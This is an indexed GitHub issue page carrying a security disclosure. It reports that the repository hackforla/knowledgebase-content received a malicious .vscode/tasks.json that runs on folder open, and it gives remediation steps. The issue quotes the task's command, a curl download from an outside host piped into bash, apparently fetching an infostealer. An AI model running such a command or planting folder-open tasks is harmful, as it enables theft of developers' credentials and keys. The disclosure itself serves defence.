hackforla / hackforla/knowledgebase-content

Security: Repository contains malicious .vscode/tasks.json (TasksJacker campaign)

Offen
#161 0 Kommentare 0 Reaktionen 0 zugewiesene Personen Auf GitHub ansehen
Vorherrschende Sprache
Keine Sprachdaten
Sterne
2
Forks
1
PR-Merge-Kennzahlen
Keine gemergten PRs in 30 T.

Beschreibung

## Security Disclosure: This repository has been compromised

The repository **hackforla/knowledgebase-content** was compromised on **February 9, 2026** by the **TasksJacker** campaign — a DPRK-linked supply chain attack. A malicious `.vscode/tasks.json` file was injected that automatically executes malware when anyone opens this repository in VS Code.

**This is not spam.** This disclosure is from the [OpenSourceMalware.com](https://opensourcemalware.com) research team, which first identified and published research on this campaign.

### Compromised file

- **`.vscode/tasks.json`** — contains a task with `"runOn": "folderOpen"` trigger

### What the malicious file does

The `tasks.json` silently executes `curl https://260120.vercel.app/... | bash` when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:

- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens

### Why this matters for hackforla

As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.

### Immediate remediation steps

1. **Delete `.vscode/tasks.json`** from this repository
2. **Force-push** to remove it from git history
3. **Rotate credentials**: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
4. **Enable 2FA** on all accounts with push access
5. **Notify contributors** who may have cloned this repo between Feb 9 and now
6. **Scan machines** of anyone with push access:
```bash
ps aux | grep "\.vscode.*node"
ls -la ~/.vscode/node-v*-*/
```

### More information

- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)

---
*Disclosed by the [OpenSourceMalware.com](https://opensourcemalware.com) research team.*

Beitragsleitfaden

Beitragsleitfaden öffnen

Rechercherichtung

Start by inspecting .vscode/tasks.json and reading the linked TasksJacker analysis. Use the disclosure's remediation list to verify removal from the repository and history, credential rotation, 2FA, contributor notification, and scans of affected machines.

Vom Indexierungsmodell aus dem Issue-Text verfasst.

Bewertung

Tech-Stack
git, vscode
Bereich
security
Issue-Typ
Bug
Schwierigkeit
5/5
Geschätzter Aufwand
Über eine Woche
Aktivitätsstatus
Veraltet
Klarheit
Klar beschrieben
Anfängerfreundlichkeit
20/100

Neue Issues direkt in Ihr Postfach

Eine kurze Übersicht über anfängerfreundliche GitHub-Issues.